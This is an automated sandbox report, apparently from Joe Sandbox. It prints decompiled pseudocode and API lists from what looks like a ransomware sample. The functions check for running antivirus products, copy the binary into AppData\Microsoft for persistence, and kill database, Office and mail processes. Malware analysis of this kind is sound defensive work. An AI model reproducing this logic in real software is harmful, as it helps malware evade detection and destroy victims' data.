                                    
                                    				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    				_t68 = _a4;
                                    				 *_t68 = _t46;
                                    				_v80 = L"AVP.EXE";
                                    				_v76 = L"ekrn.exe";
                                    				_v72 = L"avgnt.exe";
                                    				_v68 = L"ashDisp.exe";
                                    				_v64 = L"NortonAntiBot.exe";
                                    				_v60 = L"Mcshield.exe";
                                    				_v56 = L"avengine.exe";
                                    				_v52 = L"cmdagent.exe";
                                    				_v48 = L"smc.exe";
                                    				_v44 = L"persfw.exe";
                                    				_v40 = L"pccpfw.exe";
                                    				_v36 = L"fsguiexe.exe";
                                    				_v32 = L"cfp.exe";
                                    				_v28 = L"msmpeng.exe";
                                    				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                    				_t75 = _t47;
                                    				_v24 = _t75;
                                    				if(_t75 == 0) {
                                    					L3:
                                    					return 0;
                                    				} else {
                                    					 *_t75 = 0x22c; // executed
                                    					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                    					_v20 = _t49;
                                    					if(_t49 != 0xffffffff) {
                                    						_t79 = 0;
                                    						_push(_t75);
                                    						_v12 = 0;
                                    						_a4 = 0;
                                    						_v16 = 0;
                                    						_v8 = 0;
                                    						_t50 = Process32FirstW(_t49); // executed
                                    						if(_t50 != 0) {
                                    							L6:
                                    							while(_t79 == 0) {
                                    								_t77 = _t75 + 0x24;
                                    								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
                                    									_t79 = _t79 + 1;
                                    									if(_t79 < 0xe) {
                                    										continue;
                                    									} else {
                                    										_t79 = _v8;
                                    									}
                                    									L15:
                                    									_t75 = _v24;
                                    									_t63 = Process32NextW(_v20, _t75); // executed
                                    									if(_t63 != 0 && GetLastError() != 0x12) {
                                    										goto L6;
                                    									}
                                    									goto L17;
                                    								}
                                    								_push(_t77);
                                    								_push( *_t68);
                                    								_v16 = 1;
                                    								if(_a4 != 0) {
                                    									lstrcatW();
                                    									lstrcatW( *_t68, ",");
                                    								} else {
                                    									lstrcpyW();
                                    									lstrcatW( *_t68, ",");
                                    								}
                                    								_a4 =  &(_a4[0]);
                                    								_v12 = _v12 + lstrlenW(_t77) * 2;
                                    								_t79 =  >  ? 1 : _v8;
                                    								_v8 = _t79;
                                    								goto L15;
                                    							}
                                    							L17:
                                    							if(_v16 != 0) {
                                    								_t56 =  *_t68;
                                    								if( *_t56 != 0) {
                                    									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
                                    								}
                                    							}
                                    							 *_a8 = _v12;
                                    						}
                                    						VirtualFree(_t75, 0, 0x8000); // executed
                                    						FindCloseChangeNotification(_v20); // executed
                                    						_t76 = _v16;
                                    						if(_t76 == 0) {
                                    							VirtualFree( *_t68, _t76, 0x8000); // executed
                                    						}
                                    						return _t76;
                                    					} else {
                                    						VirtualFree(_t75, 0, 0x8000);
                                    						goto L3;
                                    					}
                                    				}
                                    			}


































                                    0x0f587b8d
                                    0x0f587b8f
                                    0x0f587b9d
                                    0x0f587b9f
                                    0x0f587ba6
                                    0x0f587bad
                                    0x0f587bb4
                                    0x0f587bbb
                                    0x0f587bc2
                                    0x0f587bc9
                                    0x0f587bd0
                                    0x0f587bd7
                                    0x0f587bde
                                    0x0f587be5
                                    0x0f587bec
                                    0x0f587bf3
                                    0x0f587bfa
                                    0x0f587c01
                                    0x0f587c03
                                    0x0f587c05
                                    0x0f587c0a
                                    0x0f587c34
                                    0x0f587c3a
                                    0x0f587c0c
                                    0x0f587c10
                                    0x0f587c16
                                    0x0f587c1c
                                    0x0f587c22
                                    0x0f587c3f
                                    0x0f587c41
                                    0x0f587c43
                                    0x0f587c46
                                    0x0f587c49
                                    0x0f587c4c
                                    0x0f587c4f
                                    0x0f587c57
                                    0x00000000
                                    0x0f587c60
                                    0x0f587c68
                                    0x0f587c70
                                    0x0f587c7f
                                    0x0f587c83
                                    0x00000000
                                    0x0f587c85
                                    0x0f587c85
                                    0x0f587c85
                                    0x0f587ce7
                                    0x0f587ce7
                                    0x0f587cee
                                    0x0f587cf6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f587cf6
                                    0x0f587c8e
                                    0x0f587c8f
                                    0x0f587c91
                                    0x0f587c98
                                    0x0f587cb5
                                    0x0f587cbe
                                    0x0f587c9a
                                    0x0f587c9a
                                    0x0f587ca7
                                    0x0f587ca7
                                    0x0f587cc0
                                    0x0f587cde
                                    0x0f587ce1
                                    0x0f587ce4
                                    0x00000000
                                    0x0f587ce4
                                    0x0f587d07
                                    0x0f587d0b
                                    0x0f587d0d
                                    0x0f587d13
                                    0x0f587d20
                                    0x0f587d20
                                    0x0f587d13
                                    0x0f587d2b
                                    0x0f587d2b
                                    0x0f587d3b
                                    0x0f587d40
                                    0x0f587d46
                                    0x0f587d4b
                                    0x0f587d55
                                    0x0f587d55
                                    0x0f587d5f
                                    0x0f587c24
                                    0x0f587c2c
                                    0x00000000
                                    0x0f587c2c
                                    0x0f587c22

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0F587C01
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C
                                    • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F587C4F
                                    • lstrcmpiW.KERNEL32(0F5903AC,-00000024), ref: 0F587C75
                                    • Process32NextW.KERNEL32(?,?), ref: 0F587CEE
                                    • GetLastError.KERNEL32 ref: 0F587CF8
                                    • lstrlenW.KERNEL32(00000000), ref: 0F587D16
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587D3B
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0F587D40
                                    • VirtualFree.KERNELBASE(?,?,00008000), ref: 0F587D55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
                                    • String ID: i)w
                                    • API String ID: 1411803383-1280834553
                                    • Opcode ID: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
                                    • Instruction ID: bf7ffb222bc93faeca42814bda6c4ed375b14932ef22ecdb0bff7d343602f07c
                                    • Opcode Fuzzy Hash: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
                                    • Instruction Fuzzy Hash: 5851AE71900218EBCF149FA4E948BAE7FB4FF48725F20406AE505BB381C7746906DF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 387 f582ad0-f582b00 VirtualAlloc 388 f582b1c-f582b1e 387->388 389 f582b02-f582b1a 387->389 390 f582b20-f582b4a GetModuleFileNameW GetTempPathW call f5881f0 388->390 389->390 393 f582b4c-f582b4e 390->393 394 f582b53-f582bae lstrlenW call f5882b0 GetEnvironmentVariableW call f5881f0 390->394 395 f582c40 call f582960 393->395 402 f582bd8-f582c07 lstrcatW * 3 call f582890 394->402 403 f582bb0-f582bc4 394->403 400 f582c45-f582c47 ExitThread 395->400 402->400 409 f582c09-f582c1d 402->409 407 f582bd3 403->407 408 f582bc6-f582bd1 403->408 410 f582bd5-f582bd6 407->410 408->407 408->410 413 f582c2c 409->413 414 f582c1f-f582c2a 409->414 411 f582c2f-f582c3d wsprintfW 410->411 411->395 415 f582c2e 413->415 414->413 414->415 415->411
                                    C-Code - Quality: 93%
                                    			E0F582AD0() {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				short _v20;
                                    				WCHAR* _v24;
                                    				WCHAR* _v28;
                                    				long _v32;
                                    				intOrPtr _v36;
                                    				WCHAR* _t24;
                                    				void* _t27;
                                    				WCHAR* _t33;
                                    				WCHAR* _t38;
                                    				signed int _t40;
                                    				signed int _t46;
                                    				WCHAR* _t50;
                                    				WCHAR* _t54;
                                    				void* _t56;
                                    				WCHAR* _t57;
                                    				void* _t58;
                                    				WCHAR* _t64;
                                    				WCHAR* _t65;
                                    				WCHAR* _t67;
                                    				signed int _t69;
                                    				void* _t71;
                                    				void* _t72;
                                    
                                    				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                    				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
                                    				_v24 = _t24;
                                    				_t64 = _t24;
                                    				_v32 = 0;
                                    				if(_t24 == 0) {
                                    					_t67 = 0;
                                    					_t50 = 0;
                                    					__eflags = 0;
                                    				} else {
                                    					_t3 =  &(_t24[0x101]); // 0x202
                                    					_t65 = _t3;
                                    					_v32 = 0x404;
                                    					_t50 = _t65;
                                    					_t67 = _t24;
                                    					_t64 =  &(_t65[0x101]);
                                    				}
                                    				_v28 = _t67;
                                    				GetModuleFileNameW(0, _t67, 0x100);
                                    				GetTempPathW(0x100, _t50);
                                    				_t6 =  &(_t50[1]); // 0x204
                                    				_t27 = E0F5881F0(_t67, _t6);
                                    				_t75 = _t27;
                                    				if(_t27 == 0) {
                                    					_v20 = 0x520050;
                                    					_v8 = 0;
                                    					_push(0x52);
                                    					_v16 = 0x440049;
                                    					_v12 = 0x520055;
                                    					E0F5882B0( &_v20, lstrlenW( &_v20)); // executed
                                    					_t72 = _t71 + 4;
                                    					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                    					_t13 =  &(_t50[1]); // 0x2
                                    					_t54 = _t67;
                                    					_t33 = E0F5881F0(_t54, _t13);
                                    					__eflags = _t33;
                                    					if(_t33 == 0) {
                                    						lstrcatW(_t50, L"\\Microsoft\\");
                                    						lstrcatW(_t50,  &_v20);
                                    						lstrcatW(_t50, L".exe");
                                    						_push(_t54);
                                    						_t38 = E0F582890(_v28, _t50);
                                    						_t72 = _t72 + 4;
                                    						__eflags = _t38;
                                    						if(_t38 == 0) {
                                    							goto L17;
                                    						}
                                    						_t40 = lstrlenW(_t50);
                                    						__eflags = _v28;
                                    						_t56 = 0xa + _t40 * 2;
                                    						if(_v28 == 0) {
                                    							L13:
                                    							_t64 = 0;
                                    							__eflags = 0;
                                    							L14:
                                    							_push(_t50);
                                    							L15:
                                    							wsprintfW(_t64, L"\"%s\"");
                                    							_t57 = _t64;
                                    							goto L16;
                                    						}
                                    						__eflags = _v36 + _t56 - 0x800;
                                    						if(__eflags < 0) {
                                    							goto L14;
                                    						}
                                    						goto L13;
                                    					}
                                    					_t46 = lstrlenW(_t67);
                                    					__eflags = _v28;
                                    					_t58 = 0xa + _t46 * 2;
                                    					if(_v28 == 0) {
                                    						L8:
                                    						_t64 = 0;
                                    						__eflags = 0;
                                    						L9:
                                    						_push(_t67);
                                    						goto L15;
                                    					}
                                    					__eflags = _v36 + _t58 - 0x800;
                                    					if(__eflags < 0) {
                                    						goto L9;
                                    					}
                                    					goto L8;
                                    				} else {
                                    					_t57 = _t67;
                                    					L16:
                                    					E0F582960(_t57, _t75); // executed
                                    					L17:
                                    					ExitThread(0);
                                    				}
                                    			}




























                                    0x0f582ad6
                                    0x0f582aea
                                    0x0f582af0
                                    0x0f582af4
                                    0x0f582af6
                                    0x0f582b00
                                    0x0f582b1c
                                    0x0f582b1e
                                    0x0f582b1e
                                    0x0f582b02
                                    0x0f582b02
                                    0x0f582b02
                                    0x0f582b08
                                    0x0f582b10
                                    0x0f582b12
                                    0x0f582b14
                                    0x0f582b14
                                    0x0f582b28
                                    0x0f582b2c
                                    0x0f582b38
                                    0x0f582b3e
                                    0x0f582b43
                                    0x0f582b48
                                    0x0f582b4a
                                    0x0f582b55
                                    0x0f582b62
                                    0x0f582b67
                                    0x0f582b6c
                                    0x0f582b75
                                    0x0f582b89
                                    0x0f582b8e
                                    0x0f582b9c
                                    0x0f582ba2
                                    0x0f582ba5
                                    0x0f582ba7
                                    0x0f582bac
                                    0x0f582bae
                                    0x0f582be4
                                    0x0f582bec
                                    0x0f582bf4
                                    0x0f582bf6
                                    0x0f582bfd
                                    0x0f582c02
                                    0x0f582c05
                                    0x0f582c07
                                    0x00000000
                                    0x00000000
                                    0x0f582c0f
                                    0x0f582c11
                                    0x0f582c16
                                    0x0f582c1d
                                    0x0f582c2c
                                    0x0f582c2c
                                    0x0f582c2c
                                    0x0f582c2e
                                    0x0f582c2e
                                    0x0f582c2f
                                    0x0f582c35
                                    0x0f582c3b
                                    0x00000000
                                    0x0f582c3d
                                    0x0f582c25
                                    0x0f582c2a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f582c2a
                                    0x0f582bb6
                                    0x0f582bb8
                                    0x0f582bbd
                                    0x0f582bc4
                                    0x0f582bd3
                                    0x0f582bd3
                                    0x0f582bd3
                                    0x0f582bd5
                                    0x0f582bd5
                                    0x00000000
                                    0x0f582bd5
                                    0x0f582bcc
                                    0x0f582bd1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f582b4c
                                    0x0f582b4c
                                    0x0f582c40
                                    0x0f582c40
                                    0x0f582c45
                                    0x0f582c47
                                    0x0f582c47

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0F582AEA
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
                                    • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
                                    • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F582B7D
                                      • Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
                                      • Part of subcall function 0F5882B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0F5882FB
                                      • Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
                                      • Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
                                      • Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
                                      • Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
                                      • Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
                                    • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F582B9C
                                    • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F582BE4
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F582BEC
                                    • lstrcatW.KERNEL32(00000000,.exe), ref: 0F582BF4
                                    • wsprintfW.USER32 ref: 0F582C35
                                    • ExitThread.KERNEL32 ref: 0F582C47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                    • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                    • API String ID: 139215849-2398311915
                                    • Opcode ID: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
                                    • Instruction ID: 771572041b1eb57703340caded6851e0109114bff87869e903ba5e3081b329f2
                                    • Opcode Fuzzy Hash: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
                                    • Instruction Fuzzy Hash: 5E419F71204311ABE304EF20DD49BAB7FD9BB88715F044439B545B6282DBBC990BCBA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 430 f5848c0-f584a56 CreateToolhelp32Snapshot VirtualAlloc 431 f584a58-f584a61 430->431 432 f584a6b-f584a71 430->432 431->432 433 f584a63-f584a65 Process32FirstW 431->433 434 f584a74-f584a76 432->434 433->432 435 f584a80-f584a8d 434->435 437 f584abb-f584ac2 435->437 438 f584a8f-f584a9f OpenProcess 435->438 437->435 439 f584ac4-f584ad5 Process32NextW 437->439 440 f584aa1-f584ab3 TerminateProcess CloseHandle 438->440 441 f584ab5 438->441 439->434 442 f584ad7-f584ad9 439->442 440->437 441->437 443 f584ae9-f584af2 FindCloseChangeNotification 442->443 444 f584adb-f584ae3 VirtualFree 442->444 444->443
                                    C-Code - Quality: 98%
                                    			E0F5848C0() {
                                    				char* _v12;
                                    				char* _v16;
                                    				char* _v20;
                                    				char* _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char* _v48;
                                    				char* _v52;
                                    				char* _v56;
                                    				char* _v60;
                                    				char* _v64;
                                    				char* _v68;
                                    				char* _v72;
                                    				char* _v76;
                                    				char* _v80;
                                    				char* _v84;
                                    				char* _v88;
                                    				char* _v92;
                                    				char* _v96;
                                    				char* _v100;
                                    				char* _v104;
                                    				char* _v108;
                                    				char* _v112;
                                    				char* _v116;
                                    				char* _v120;
                                    				char* _v124;
                                    				char* _v128;
                                    				char* _v132;
                                    				char* _v136;
                                    				char* _v140;
                                    				char* _v144;
                                    				char* _v148;
                                    				char* _v152;
                                    				char* _v156;
                                    				char* _v160;
                                    				char* _v164;
                                    				void* _v172;
                                    				void* _t49;
                                    				void* _t50;
                                    				int _t51;
                                    				int _t52;
                                    				int _t53;
                                    				void* _t60;
                                    				WCHAR* _t62;
                                    				void* _t65;
                                    				void* _t70;
                                    				signed int _t71;
                                    				void* _t72;
                                    				signed int _t74;
                                    				void* _t76;
                                    
                                    				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                    				_v164 = L"msftesql.exe";
                                    				_v160 = L"sqlagent.exe";
                                    				_v156 = L"sqlbrowser.exe";
                                    				_v152 = L"sqlservr.exe";
                                    				_v148 = L"sqlwriter.exe";
                                    				_v144 = L"oracle.exe";
                                    				_v140 = L"ocssd.exe";
                                    				_v136 = L"dbsnmp.exe";
                                    				_v132 = L"synctime.exe";
                                    				_v128 = L"mydesktopqos.exe";
                                    				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                    				_v120 = L"xfssvccon.exe";
                                    				_v116 = L"mydesktopservice.exe";
                                    				_v112 = L"ocautoupds.exe";
                                    				_v108 = L"agntsvc.exeagntsvc.exe";
                                    				_v104 = L"agntsvc.exeencsvc.exe";
                                    				_v100 = L"firefoxconfig.exe";
                                    				_v96 = L"tbirdconfig.exe";
                                    				_v92 = L"ocomm.exe";
                                    				_v88 = L"mysqld.exe";
                                    				_v84 = L"mysqld-nt.exe";
                                    				_v80 = L"mysqld-opt.exe";
                                    				_v76 = L"dbeng50.exe";
                                    				_v72 = L"sqbcoreservice.exe";
                                    				_v68 = L"excel.exe";
                                    				_v64 = L"infopath.exe";
                                    				_v60 = L"msaccess.exe";
                                    				_v56 = L"mspub.exe";
                                    				_v52 = L"onenote.exe";
                                    				_v48 = L"outlook.exe";
                                    				_v44 = L"powerpnt.exe";
                                    				_v40 = L"steam.exe";
                                    				_v36 = L"sqlservr.exe";
                                    				_v32 = L"thebat.exe";
                                    				_v28 = L"thebat64.exe";
                                    				_v24 = L"thunderbird.exe";
                                    				_v20 = L"visio.exe";
                                    				_v16 = L"winword.exe";
                                    				_v12 = L"wordpad.exe";
                                    				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                    				_t70 = _t49;
                                    				_v172 = _t70;
                                    				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
                                    				_t60 = _t50;
                                    				if(_t60 != 0) {
                                    					 *_t60 = 0x22c;
                                    					if(_t70 != 0xffffffff) {
                                    						_push(_t60);
                                    						Process32FirstW(_t70); // executed
                                    					}
                                    				}
                                    				_t41 = _t60 + 0x24; // 0x24
                                    				_t62 = _t41;
                                    				do {
                                    					_t71 = 0;
                                    					do {
                                    						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                    						if(_t51 == 0) {
                                    							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                    							if(_t65 != 0) {
                                    								TerminateProcess(_t65, 0);
                                    								CloseHandle(_t65);
                                    							}
                                    						}
                                    						_t71 = _t71 + 1;
                                    						_t46 = _t60 + 0x24; // 0x24
                                    						_t62 = _t46;
                                    					} while (_t71 < 0x27);
                                    					_t72 = _v172;
                                    					_t52 = Process32NextW(_t72, _t60);
                                    					_t48 = _t60 + 0x24; // 0x24
                                    					_t62 = _t48;
                                    				} while (_t52 != 0);
                                    				if(_t60 != 0) {
                                    					VirtualFree(_t60, 0, 0x8000); // executed
                                    				}
                                    				_t53 = FindCloseChangeNotification(_t72); // executed
                                    				return _t53;
                                    			}
























































                                    0x0f5848c6
                                    0x0f5848d3
                                    0x0f5848db
                                    0x0f5848e3
                                    0x0f5848eb
                                    0x0f5848f3
                                    0x0f5848fb
                                    0x0f584903
                                    0x0f58490b
                                    0x0f584913
                                    0x0f58491b
                                    0x0f584923
                                    0x0f58492b
                                    0x0f584933
                                    0x0f58493b
                                    0x0f584943
                                    0x0f58494b
                                    0x0f584953
                                    0x0f58495b
                                    0x0f584963
                                    0x0f58496b
                                    0x0f584973
                                    0x0f58497b
                                    0x0f584983
                                    0x0f58498b
                                    0x0f584993
                                    0x0f58499b
                                    0x0f5849a3
                                    0x0f5849ae
                                    0x0f5849b9
                                    0x0f5849c4
                                    0x0f5849cf
                                    0x0f5849da
                                    0x0f5849e5
                                    0x0f5849f0
                                    0x0f5849fb
                                    0x0f584a06
                                    0x0f584a11
                                    0x0f584a1c
                                    0x0f584a27
                                    0x0f584a32
                                    0x0f584a44
                                    0x0f584a48
                                    0x0f584a4c
                                    0x0f584a52
                                    0x0f584a56
                                    0x0f584a58
                                    0x0f584a61
                                    0x0f584a63
                                    0x0f584a65
                                    0x0f584a65
                                    0x0f584a61
                                    0x0f584a71
                                    0x0f584a71
                                    0x0f584a74
                                    0x0f584a74
                                    0x0f584a80
                                    0x0f584a85
                                    0x0f584a8d
                                    0x0f584a9b
                                    0x0f584a9f
                                    0x0f584aa4
                                    0x0f584ab1
                                    0x0f584ab1
                                    0x0f584a9f
                                    0x0f584abb
                                    0x0f584abc
                                    0x0f584abc
                                    0x0f584abf
                                    0x0f584ac4
                                    0x0f584aca
                                    0x0f584ad0
                                    0x0f584ad0
                                    0x0f584ad3
                                    0x0f584ad9
                                    0x0f584ae3
                                    0x0f584ae3
                                    0x0f584aea
                                    0x0f584af2

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0F584A32
                                    • VirtualAlloc.KERNELBASE(00000000,0000022C,00003000,00000004), ref: 0F584A4C
                                    • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F584A65
                                    • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
                                    • CloseHandle.KERNEL32(00000000), ref: 0F584AB1
                                    • Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0F584AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
                                    • String ID: i)w
                                    • API String ID: 3023235786-1280834553
                                    • Opcode ID: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
                                    • Instruction ID: a5e6a378b55c7ef619c32334364e3d2b63d1585fd9da39f2db305f325d105f33
                                    • Opcode Fuzzy Hash: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
                                    • Instruction Fuzzy Hash: D5515EB51083419FE320EF51954875BBFE4FBA9718F60492DE594BB252C734880BCF96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
                                      • Part of subcall function 0F587490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
                                      • Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
                                      • Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
                                      • Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
                                      • Part of subcall function 0F587490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
                                      • Part of subcall function 0F587490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
                                      • Part of subcall function 0F587490: RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
                                      • Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
                                    • lstrcpyW.KERNEL32 ref: 0F58484F
